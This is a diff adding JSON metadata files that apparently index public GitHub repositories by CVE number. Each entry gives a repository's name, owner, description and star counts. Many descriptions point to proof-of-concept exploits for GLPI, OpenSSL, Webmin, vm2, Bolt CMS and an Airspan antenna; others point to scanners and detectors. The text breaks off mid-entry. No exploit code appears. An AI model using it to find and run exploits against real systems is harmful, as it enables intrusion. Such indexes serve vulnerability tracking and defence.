"senderend\/CVE-2022-35914", + "owner": { + "login": "senderend", + "id": 90939597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90939597?v=4", + "html_url": "https:\/\/github.com\/senderend", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/senderend\/CVE-2022-35914", + "description": "PoC exploit for GLPI - Command injection using a third-party library script", + "fork": false, + "created_at": "2024-04-24T06:39:10Z", + "updated_at": "2024-10-23T14:37:19Z", + "pushed_at": "2024-10-17T17:56:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 847425433, + "name": "CVE-2022-35914_poc", + "full_name": "noxlumens\/CVE-2022-35914_poc", + "owner": { + "login": "noxlumens", + "id": 111706416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111706416?v=4", + "html_url": "https:\/\/github.com\/noxlumens", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noxlumens\/CVE-2022-35914_poc", + "description": "Modified for GLPI Offsec Lab: call_user_func, array_map, passthru", + "fork": false, + "created_at": "2024-08-25T19:32:59Z", + "updated_at": "2024-08-25T19:34:26Z", + "pushed_at": "2024-08-25T19:34:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860618453, + "name": "exploit_CVE-2022-35914", + "full_name": "btar1gan\/exploit_CVE-2022-35914", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2022-35914", + "description": null, + "fork": false, + "created_at": "2024-09-20T19:28:27Z", + "updated_at": "2024-09-20T19:43:22Z", + "pushed_at": "2024-09-20T19:43:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35919.json b/2022/CVE-2022-35919.json new file mode 100644 index 0000000000..58ee59bd1d --- /dev/null +++ b/2022/CVE-2022-35919.json @@ -0,0 +1,33 @@ +[ + { + "id": 742651580, + "name": "Minio-Security-Vulnerability-Checker", + "full_name": "ifulxploit\/Minio-Security-Vulnerability-Checker", + "owner": { + "login": "ifulxploit", + "id": 107668520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107668520?v=4", + "html_url": "https:\/\/github.com\/ifulxploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifulxploit\/Minio-Security-Vulnerability-Checker", + "description": "Program ini adalah alat (tool) yang dibuat untuk memeriksa keamanan sistem Minio terkait dengan kerentanan CVE-2022-35919", + "fork": false, + "created_at": "2024-01-13T00:49:51Z", + "updated_at": "2024-01-13T00:56:58Z", + "pushed_at": "2024-01-13T00:56:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3602.json b/2022/CVE-2022-3602.json new file mode 100644 index 0000000000..fc9d9bbb85 --- /dev/null +++ b/2022/CVE-2022-3602.json @@ -0,0 +1,261 @@ +[ + { + "id": 558789477, + "name": "OpenSSL-2022", + "full_name": "NCSC-NL\/OpenSSL-2022", + "owner": { + "login": "NCSC-NL", + "id": 16208471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16208471?v=4", + "html_url": "https:\/\/github.com\/NCSC-NL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NCSC-NL\/OpenSSL-2022", + "description": "Operational information regarding CVE-2022-3602 and CVE-2022-3786, two vulnerabilities in OpenSSL 3", + "fork": false, + "created_at": "2022-10-28T09:51:41Z", + "updated_at": "2025-01-06T11:40:10Z", + "pushed_at": "2022-11-18T15:47:17Z", + "stargazers_count": 531, + "watchers_count": 531, + "has_discussions": false, + "forks_count": 110, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-3602", + "cve-2022-3786", + "openssl", + "spookyssl" + ], + "visibility": "public", + "forks": 110, + "watchers": 531, + "score": 0, + "subscribers_count": 46 + }, + { + "id": 559712382, + "name": "CVE-2022-3602", + "full_name": "colmmacc\/CVE-2022-3602", + "owner": { + "login": "colmmacc", + "id": 172568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172568?v=4", + "html_url": "https:\/\/github.com\/colmmacc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/colmmacc\/CVE-2022-3602", + "description": null, + "fork": false, + "created_at": "2022-10-30T23:32:56Z", + "updated_at": "2024-12-19T02:40:39Z", + "pushed_at": "2022-11-01T19:56:40Z", + "stargazers_count": 168, + "watchers_count": 168, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 168, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 560108403, + "name": "CVE-2022-3602-poc", + "full_name": "eatscrayon\/CVE-2022-3602-poc", + "owner": { + "login": "eatscrayon", + "id": 99401683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99401683?v=4", + "html_url": "https:\/\/github.com\/eatscrayon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eatscrayon\/CVE-2022-3602-poc", + "description": null, + "fork": false, + "created_at": "2022-10-31T18:52:24Z", + "updated_at": "2024-08-12T20:28:06Z", + "pushed_at": "2022-11-01T17:24:35Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560635749, + "name": "cve-2022-3602", + "full_name": "attilaszia\/cve-2022-3602", + "owner": { + "login": "attilaszia", + "id": 15521680, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15521680?v=4", + "html_url": "https:\/\/github.com\/attilaszia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/attilaszia\/cve-2022-3602", + "description": "cve-2022-3602 poc", + "fork": false, + "created_at": "2022-11-01T23:36:08Z", + "updated_at": "2024-01-18T20:23:36Z", + "pushed_at": "2022-11-01T23:41:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 560793497, + "name": "SpookySSL-Scanner", + "full_name": "alicangnll\/SpookySSL-Scanner", + "owner": { + "login": "alicangnll", + "id": 23417905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23417905?v=4", + "html_url": "https:\/\/github.com\/alicangnll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alicangnll\/SpookySSL-Scanner", + "description": "SpookySSL CVE-2022-3602 SSLv3 Scanner for Windows, Linux, macOS", + "fork": false, + "created_at": "2022-11-02T09:29:04Z", + "updated_at": "2024-08-12T20:28:08Z", + "pushed_at": "2022-11-02T14:39:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-3602", + "openssl", + "scanner", + "spookyssl", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560986236, + "name": "cve-2022-3602-and-cve-2022-3786-openssl-poc", + "full_name": "rbowes-r7\/cve-2022-3602-and-cve-2022-3786-openssl-poc", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/cve-2022-3602-and-cve-2022-3786-openssl-poc", + "description": null, + "fork": false, + "created_at": "2022-11-02T17:33:26Z", + "updated_at": "2024-12-21T03:53:31Z", + "pushed_at": "2022-11-02T17:33:46Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 18, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 561142579, + "name": "CVE-2022-3602", + "full_name": "corelight\/CVE-2022-3602", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-3602", + "description": "Detects attempts at exploitation of CVE-2022-3602, a remote code execution vulnerability in OpenSSL v 3.0.0 through v.3.0.6 ", + "fork": false, + "created_at": "2022-11-03T03:19:52Z", + "updated_at": "2022-12-15T08:52:06Z", + "pushed_at": "2022-11-24T05:17:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 562763927, + "name": "CVE-2022-3602-and-CVE-2022-3786", + "full_name": "cybersecurityworks553\/CVE-2022-3602-and-CVE-2022-3786", + "owner": { + "login": "cybersecurityworks553", + "id": 63910792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4", + "html_url": "https:\/\/github.com\/cybersecurityworks553", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybersecurityworks553\/CVE-2022-3602-and-CVE-2022-3786", + "description": null, + "fork": false, + "created_at": "2022-11-07T07:58:36Z", + "updated_at": "2024-08-14T14:52:12Z", + "pushed_at": "2022-11-09T08:21:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36067.json b/2022/CVE-2022-36067.json new file mode 100644 index 0000000000..e0f6acb013 --- /dev/null +++ b/2022/CVE-2022-36067.json @@ -0,0 +1,64 @@ +[ + { + "id": 550259625, + "name": "CVE-2022-36067-vm2-POC-webapp", + "full_name": "0x1nsomnia\/CVE-2022-36067-vm2-POC-webapp", + "owner": { + "login": "0x1nsomnia", + "id": 107571078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107571078?v=4", + "html_url": "https:\/\/github.com\/0x1nsomnia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x1nsomnia\/CVE-2022-36067-vm2-POC-webapp", + "description": null, + "fork": false, + "created_at": "2022-10-12T13:09:29Z", + "updated_at": "2023-04-10T21:56:16Z", + "pushed_at": "2022-10-12T13:51:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 562153901, + "name": "Exploit-For-CVE-2022-36067", + "full_name": "Prathamrajgor\/Exploit-For-CVE-2022-36067", + "owner": { + "login": "Prathamrajgor", + "id": 78405248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78405248?v=4", + "html_url": "https:\/\/github.com\/Prathamrajgor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Prathamrajgor\/Exploit-For-CVE-2022-36067", + "description": "This repo contains payload for the CVE-2022-36067", + "fork": false, + "created_at": "2022-11-05T13:28:27Z", + "updated_at": "2024-10-03T18:53:07Z", + "pushed_at": "2022-12-28T15:55:24Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36162.json b/2022/CVE-2022-36162.json new file mode 100644 index 0000000000..eb2fcdf718 --- /dev/null +++ b/2022/CVE-2022-36162.json @@ -0,0 +1,33 @@ +[ + { + "id": 525131569, + "name": "CVE-2022-36162", + "full_name": "MaherAzzouzi\/CVE-2022-36162", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-36162", + "description": null, + "fork": false, + "created_at": "2022-08-15T20:36:51Z", + "updated_at": "2023-03-17T11:49:32Z", + "pushed_at": "2022-08-15T20:41:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36163.json b/2022/CVE-2022-36163.json new file mode 100644 index 0000000000..33079ceb52 --- /dev/null +++ b/2022/CVE-2022-36163.json @@ -0,0 +1,33 @@ +[ + { + "id": 525133469, + "name": "CVE-2022-36163", + "full_name": "MaherAzzouzi\/CVE-2022-36163", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-36163", + "description": null, + "fork": false, + "created_at": "2022-08-15T20:43:53Z", + "updated_at": "2023-12-18T15:01:23Z", + "pushed_at": "2022-08-15T20:45:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36193.json b/2022/CVE-2022-36193.json new file mode 100644 index 0000000000..287690e531 --- /dev/null +++ b/2022/CVE-2022-36193.json @@ -0,0 +1,33 @@ +[ + { + "id": 616849946, + "name": "CVE-2022-36193", + "full_name": "G37SYS73M\/CVE-2022-36193", + "owner": { + "login": "G37SYS73M", + "id": 77768845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4", + "html_url": "https:\/\/github.com\/G37SYS73M", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2022-36193", + "description": "SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.", + "fork": false, + "created_at": "2023-03-21T08:00:49Z", + "updated_at": "2023-03-21T08:00:49Z", + "pushed_at": "2023-03-21T08:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36200.json b/2022/CVE-2022-36200.json new file mode 100644 index 0000000000..f25b533bf2 --- /dev/null +++ b/2022/CVE-2022-36200.json @@ -0,0 +1,33 @@ +[ + { + "id": 530180871, + "name": "CVE-2022-36200", + "full_name": "afaq1337\/CVE-2022-36200", + "owner": { + "login": "afaq1337", + "id": 45089292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45089292?v=4", + "html_url": "https:\/\/github.com\/afaq1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afaq1337\/CVE-2022-36200", + "description": "CVE-2022-36200 PoC", + "fork": false, + "created_at": "2022-08-29T11:03:09Z", + "updated_at": "2024-08-12T20:26:35Z", + "pushed_at": "2023-12-31T06:40:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36231.json b/2022/CVE-2022-36231.json new file mode 100644 index 0000000000..1376555cdc --- /dev/null +++ b/2022/CVE-2022-36231.json @@ -0,0 +1,33 @@ +[ + { + "id": 557919955, + "name": "CVE-2022-36231", + "full_name": "affix\/CVE-2022-36231", + "owner": { + "login": "affix", + "id": 184308, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/184308?v=4", + "html_url": "https:\/\/github.com\/affix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/affix\/CVE-2022-36231", + "description": "pdf_info <= 0.5.3 OS Command Injection", + "fork": false, + "created_at": "2022-10-26T14:51:57Z", + "updated_at": "2024-05-03T07:26:58Z", + "pushed_at": "2022-10-26T15:34:10Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36234.json b/2022/CVE-2022-36234.json new file mode 100644 index 0000000000..2511edcf33 --- /dev/null +++ b/2022/CVE-2022-36234.json @@ -0,0 +1,33 @@ +[ + { + "id": 595804172, + "name": "CVE-2022-36234", + "full_name": "Halcy0nic\/CVE-2022-36234", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-36234", + "description": "Proof of concept for CVE-2022-36234", + "fork": false, + "created_at": "2023-01-31T20:59:35Z", + "updated_at": "2024-07-02T20:33:25Z", + "pushed_at": "2023-07-19T16:13:01Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36267.json b/2022/CVE-2022-36267.json new file mode 100644 index 0000000000..dff2e7903d --- /dev/null +++ b/2022/CVE-2022-36267.json @@ -0,0 +1,43 @@ +[ + { + "id": 740704394, + "name": "CVE-2022-36267-PoC", + "full_name": "0xNslabs\/CVE-2022-36267-PoC", + "owner": { + "login": "0xNslabs", + "id": 122338332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122338332?v=4", + "html_url": "https:\/\/github.com\/0xNslabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xNslabs\/CVE-2022-36267-PoC", + "description": "PoC Script for CVE-2022-36267: Exploits an unauthenticated remote command injection vulnerability in Airspan AirSpot 5410 antenna.", + "fork": false, + "created_at": "2024-01-08T22:23:57Z", + "updated_at": "2024-09-13T01:20:33Z", + "pushed_at": "2024-01-08T22:37:55Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "cve-2022-36267", + "ethical-hacking", + "exploit", + "iot-security", + "lte", + "reverse-shell", + "telecommunications", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36271.json b/2022/CVE-2022-36271.json new file mode 100644 index 0000000000..39a655f486 --- /dev/null +++ b/2022/CVE-2022-36271.json @@ -0,0 +1,33 @@ +[ + { + "id": 525521767, + "name": "POC-of-CVE-2022-36271", + "full_name": "SaumyajeetDas\/POC-of-CVE-2022-36271", + "owner": { + "login": "SaumyajeetDas", + "id": 66937297, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66937297?v=4", + "html_url": "https:\/\/github.com\/SaumyajeetDas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SaumyajeetDas\/POC-of-CVE-2022-36271", + "description": "This is working POC of CVE-2022-36271 ", + "fork": false, + "created_at": "2022-08-16T19:48:36Z", + "updated_at": "2024-08-12T20:26:17Z", + "pushed_at": "2022-09-01T16:43:49Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36432.json b/2022/CVE-2022-36432.json new file mode 100644 index 0000000000..f51080e9c3 --- /dev/null +++ b/2022/CVE-2022-36432.json @@ -0,0 +1,33 @@ +[ + { + "id": 556770744, + "name": "CVE-2022-36432", + "full_name": "afine-com\/CVE-2022-36432", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-36432", + "description": "Cross-site Scripting (XSS) in Preview functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T13:36:09Z", + "updated_at": "2022-10-25T00:46:58Z", + "pushed_at": "2022-10-24T13:50:07Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36433.json b/2022/CVE-2022-36433.json new file mode 100644 index 0000000000..638d034b06 --- /dev/null +++ b/2022/CVE-2022-36433.json @@ -0,0 +1,33 @@ +[ + { + "id": 556776996, + "name": "CVE-2022-36433", + "full_name": "afine-com\/CVE-2022-36433", + "owner": { + "login": "afine-com", + "id": 105647610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105647610?v=4", + "html_url": "https:\/\/github.com\/afine-com", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afine-com\/CVE-2022-36433", + "description": "Cross-site Scripting (XSS) in blog-post creation functionality in Amasty Blog Pro for Magento 2", + "fork": false, + "created_at": "2022-10-24T13:49:17Z", + "updated_at": "2022-10-25T00:47:02Z", + "pushed_at": "2022-10-24T13:53:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36446.json b/2022/CVE-2022-36446.json new file mode 100644 index 0000000000..b2352542c5 --- /dev/null +++ b/2022/CVE-2022-36446.json @@ -0,0 +1,103 @@ +[ + { + "id": 523702714, + "name": "CVE-2022-36446-Webmin-Software-Package-Updates-RCE", + "full_name": "p0dalirius\/CVE-2022-36446-Webmin-Software-Package-Updates-RCE", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2022-36446-Webmin-Software-Package-Updates-RCE", + "description": "A Python script to exploit CVE-2022-36446 Software Package Updates RCE (Authenticated) on Webmin < 1.997.", + "fork": false, + "created_at": "2022-08-11T11:47:17Z", + "updated_at": "2024-08-21T06:25:25Z", + "pushed_at": "2022-08-23T15:57:41Z", + "stargazers_count": 110, + "watchers_count": 110, + "has_discussions": false, + "forks_count": 35, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-36446", + "exploit", + "package", + "rce", + "software", + "update", + "webmin" + ], + "visibility": "public", + "forks": 35, + "watchers": 110, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 534599250, + "name": "CVE-2022-36446", + "full_name": "emirpolatt\/CVE-2022-36446", + "owner": { + "login": "emirpolatt", + "id": 41807762, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41807762?v=4", + "html_url": "https:\/\/github.com\/emirpolatt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/emirpolatt\/CVE-2022-36446", + "description": "CVE-2022-36446 - Webmin 1.996 Remote Code Execution", + "fork": false, + "created_at": "2022-09-09T10:34:53Z", + "updated_at": "2024-08-12T20:26:53Z", + "pushed_at": "2022-09-09T10:35:09Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813427958, + "name": "CVE-2022-36446", + "full_name": "Kang3639\/CVE-2022-36446", + "owner": { + "login": "Kang3639", + "id": 118144091, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118144091?v=4", + "html_url": "https:\/\/github.com\/Kang3639", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kang3639\/CVE-2022-36446", + "description": "CVE-2022-36446 POC 실습", + "fork": false, + "created_at": "2024-06-11T04:21:28Z", + "updated_at": "2024-06-11T05:01:36Z", + "pushed_at": "2024-06-11T05:01:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36532.json b/2022/CVE-2022-36532.json new file mode 100644 index 0000000000..f1907fba43 --- /dev/null +++ b/2022/CVE-2022-36532.json @@ -0,0 +1,33 @@ +[ + { + "id": 532793677, + "name": "CVE-2022-36532", + "full_name": "lutrasecurity\/CVE-2022-36532", + "owner": { + "login": "lutrasecurity", + "id": 98662555, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/98662555?v=4", + "html_url": "https:\/\/github.com\/lutrasecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lutrasecurity\/CVE-2022-36532", + "description": "Proof of concept for CVE-2022-36532: RCE via File Upload in Bolt CMS 5.1.12 and below.", + "fork": false, + "created_at": "2022-09-05T07:39:23Z", + "updated_at": "2023-04-18T14:35:15Z", + "pushed_at": "2022-09-05T16:08:17Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36537.json b/2022/CVE-2022-36537.json new file mode 100644 index 0000000000..95f6885943 --- /dev/null +++ b/2022/CVE-2022-36537.json @@ -0,0 +1,76 @@ +[ + { + "id": 576253309, + "name": "CVE-2022-36537-EXPLOIT", + "full_name": "agnihackers\/CVE-2022-36537-EXPLOIT", + "owner": { + "login": "agnihackers", + "id": 58265761, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58265761?v=4", + "html_url": "https:\/\/github.com\/agnihackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/agnihackers\/CVE-2022-36537-EXPLOIT", + "description": "CVE-2022-36537", + "fork": false, + "created_at": "2022-12-09T11:29:26Z", + "updated_at": "2023-08-04T05:23:48Z", + "pushed_at": "2022-12-12T09:49:03Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cve-2022-36537", + "cybersecurity" + ], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 576308362, + "name": "CVE-2022-36537", + "full_name": "Malwareman007\/CVE-2022-36537", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2022-36537", + "description": "POC of CVE-2022-36537", + "fork": false, + "created_at": "2022-12-09T14:15:52Z", + 